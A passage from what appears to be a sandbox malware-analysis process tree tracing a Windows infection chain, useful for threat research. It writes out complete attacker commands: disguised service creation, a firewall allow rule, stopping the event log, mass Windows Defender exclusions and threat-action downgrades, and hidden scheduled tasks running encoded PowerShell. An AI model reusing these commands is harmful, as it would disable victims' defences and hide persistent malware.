C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2688 -s 685⤵
- Loads dropped DLL
- Program crash
-
C:\ProgramData\BFHJECAAAF.exe"C:\ProgramData\BFHJECAAAF.exe"4⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 700 -s 485⤵
- Program crash
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\HIIEBAFCBKFI" & exit4⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /t 105⤵
- Delays execution with timeout.exe
-
C:\Users\Admin\Documents\SimpleAdobe\2Bieq5wNDNkAsJ0rFBlk_AlN.exeC:\Users\Admin\Documents\SimpleAdobe\2Bieq5wNDNkAsJ0rFBlk_AlN.exe2⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\vmffvbwj\3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\hkdooxyy.exe" C:\Windows\SysWOW64\vmffvbwj\3⤵
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" create vmffvbwj binPath= "C:\Windows\SysWOW64\vmffvbwj\hkdooxyy.exe /d\"C:\Users\Admin\Documents\SimpleAdobe\2Bieq5wNDNkAsJ0rFBlk_AlN.exe\"" type= own start= auto DisplayName= "wifi support"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" description vmffvbwj "wifi internet conection"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" start vmffvbwj3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul3⤵
- Modifies Windows Firewall
-
C:\Users\Admin\Documents\SimpleAdobe\fw6AeST27Bm2vlk0DxSBSQX2.exeC:\Users\Admin\Documents\SimpleAdobe\fw6AeST27Bm2vlk0DxSBSQX2.exe2⤵
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
- Checks for any installed AV software in registry
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\aj2A10.exe"C:\Users\Admin\AppData\Local\Temp\aj2A10.exe" /relaunch=8 /was_elevated=1 /tagdata3⤵
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
- Checks for any installed AV software in registry
- Writes to the Master Boot Record (MBR)
- Modifies system certificate store
-
C:\Users\Admin\Documents\SimpleAdobe\Pus3tCSrefwVPztCKhp87ihX.exeC:\Users\Admin\Documents\SimpleAdobe\Pus3tCSrefwVPztCKhp87ihX.exe2⤵
- Executes dropped EXE
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe delete "RULTVSKP"3⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe create "RULTVSKP" binpath= "C:\ProgramData\qhbnnmvggfhr\bkqtzupkspiy.exe" start= "auto"3⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop eventlog3⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe start "RULTVSKP"3⤵
- Launches sc.exe
-
C:\Users\Admin\Documents\SimpleAdobe\DH8573Md6ciWRCrzNsLgNn0N.exeC:\Users\Admin\Documents\SimpleAdobe\DH8573Md6ciWRCrzNsLgNn0N.exe2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\is-2RQFV.tmp\DH8573Md6ciWRCrzNsLgNn0N.tmp"C:\Users\Admin\AppData\Local\Temp\is-2RQFV.tmp\DH8573Md6ciWRCrzNsLgNn0N.tmp" /SL5="$20278,5623997,54272,C:\Users\Admin\Documents\SimpleAdobe\DH8573Md6ciWRCrzNsLgNn0N.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\SVO Media Player\svomediaplayer32.exe"C:\Users\Admin\AppData\Local\SVO Media Player\svomediaplayer32.exe" -i4⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\SVO Media Player\svomediaplayer32.exe"C:\Users\Admin\AppData\Local\SVO Media Player\svomediaplayer32.exe" -s4⤵
- Executes dropped EXE
-
C:\Users\Admin\Documents\SimpleAdobe\f2hEJNjebYbdDHdjR8ZZyQ9Q.exeC:\Users\Admin\Documents\SimpleAdobe\f2hEJNjebYbdDHdjR8ZZyQ9Q.exe2⤵
- Executes dropped EXE
- Writes to the Master Boot Record (MBR)
-
C:\Users\Admin\AppData\Local\Temp\file\setup.exe"C:\Users\Admin\AppData\Local\Temp\file\setup.exe"1⤵
- Executes dropped EXE
-
C:\ProgramData\qhbnnmvggfhr\bkqtzupkspiy.exeC:\ProgramData\qhbnnmvggfhr\bkqtzupkspiy.exe1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 02⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 02⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 02⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 02⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\conhost.exeC:\Windows\system32\conhost.exe2⤵
-
C:\Windows\system32\svchost.exesvchost.exe2⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\vmffvbwj\hkdooxyy.exeC:\Windows\SysWOW64\vmffvbwj\hkdooxyy.exe /d"C:\Users\Admin\Documents\SimpleAdobe\2Bieq5wNDNkAsJ0rFBlk_AlN.exe"1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Windows\SysWOW64\svchost.exesvchost.exe2⤵
- Windows security bypass
- Sets service image path in registry
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-1581770322206360436-18189707221070211951-1484361193-533777962-19874667411007098208"1⤵
-
C:\Windows\system32\taskeng.exetaskeng.exe {2FF7B39F-64EE-42D4-9F27-6430FAF2A4E4} S-1-5-18:NT AUTHORITY\System:Service:1⤵
-
C:\Users\Admin\AppData\Local\Temp\WaFDGFyKTXBJSmLcQ\HCRvTsVXhEUoxKl\alRnUJb.exeC:\Users\Admin\AppData\Local\Temp\WaFDGFyKTXBJSmLcQ\HCRvTsVXhEUoxKl\alRnUJb.exe M5 /dNcdidaLlL 385135 /S2⤵
- Executes dropped EXE
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"3⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"4⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 65⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 66⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"4⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 65⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 66⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"4⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 65⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 66⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"4⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 65⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 66⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"4⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell start-process -WindowStyle Hidden gpupdate.exe /force5⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell start-process -WindowStyle Hidden gpupdate.exe /force6⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force7⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gNWllnHpu" /SC once /ST 13:45:32 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gNWllnHpu"3⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gNWllnHpu"3⤵
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True"3⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True4⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True5⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True6⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\jLjeNaiUMFXhhNbk" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\jLjeNaiUMFXhhNbk" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\jLjeNaiUMFXhhNbk" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\jLjeNaiUMFXhhNbk" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\jLjeNaiUMFXhhNbk" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\jLjeNaiUMFXhhNbk" /t REG_DWORD /d 0 /reg:324⤵
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\jLjeNaiUMFXhhNbk" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\jLjeNaiUMFXhhNbk" /t REG_DWORD /d 0 /reg:644⤵
-
C:\Windows\SysWOW64\cmd.execmd /C copy nul "C:\Windows\Temp\jLjeNaiUMFXhhNbk\kVxIoeLX\YLRnCRaKAUDEdEbE.wsf"3⤵
-
C:\Windows\SysWOW64\wscript.exewscript "C:\Windows\Temp\jLjeNaiUMFXhhNbk\kVxIoeLX\YLRnCRaKAUDEdEbE.wsf"3⤵
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LarsEiwmjwuUJnPlqwR" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LarsEiwmjwuUJnPlqwR" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\TGSqLNfOU" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\TGSqLNfOU" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\jbywMxbyABuU2" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\jbywMxbyABuU2" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\jgefCrdckMUn" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\jgefCrdckMUn" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\vZXYUjRGERiGC" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\vZXYUjRGERiGC" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\tvOexZGeSXRtrQVB" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\tvOexZGeSXRtrQVB" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\WaFDGFyKTXBJSmLcQ" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\WaFDGFyKTXBJSmLcQ" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\jLjeNaiUMFXhhNbk" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\jLjeNaiUMFXhhNbk" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LarsEiwmjwuUJnPlqwR" /t REG_DWORD /d 0 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LarsEiwmjwuUJnPlqwR" /t REG_DWORD /d 0 /reg:644⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\TGSqLNfOU" /t REG_DWORD /d 0 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\TGSqLNfOU" /t REG_DWORD /d 0 /reg:644⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\jbywMxbyABuU2" /t REG_DWORD /d 0 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\jbywMxbyABuU2" /t REG_DWORD /d 0 /reg:644⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\jgefCrdckMUn" /t REG_DWORD /d 0 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\jgefCrdckMUn" /t REG_DWORD /d 0 /reg:644⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\vZXYUjRGERiGC" /t REG_DWORD /d 0 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\vZXYUjRGERiGC" /t REG_DWORD /d 0 /reg:644⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\tvOexZGeSXRtrQVB" /t REG_DWORD /d 0 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\tvOexZGeSXRtrQVB" /t REG_DWORD /d 0 /reg:644⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:644⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\WaFDGFyKTXBJSmLcQ" /t REG_DWORD /d 0 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\WaFDGFyKTXBJSmLcQ" /t REG_DWORD /d 0 /reg:644⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\jLjeNaiUMFXhhNbk" /t REG_DWORD /d 0 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\jLjeNaiUMFXhhNbk" /t REG_DWORD /d 0 /reg:644⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "LyeaCXeAXIXykqmfO" /SC once /ST 10:43:12 /RU "SYSTEM" /TR "\"C:\Windows\Temp\jLjeNaiUMFXhhNbk\PpxMMFsbkSNfKUE\Pwhrnod.exe\" lW /iTkCdidGa 385135 /S" /V1 /F3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "LyeaCXeAXIXykqmfO"3⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 640 -s 3283⤵
- Program crash
-
C:\Windows\Temp\jLjeNaiUMFXhhNbk\PpxMMFsbkSNfKUE\Pwhrnod.exeC:\Windows\Temp\jLjeNaiUMFXhhNbk\PpxMMFsbkSNfKUE\Pwhrnod.exe lW /iTkCdidGa 385135 /S2⤵
- Checks computer location settings
- Executes dropped EXE
- Drops Chrome extension
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"3⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"4⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 65⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 66⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m ping.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"4⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 65⤵
-
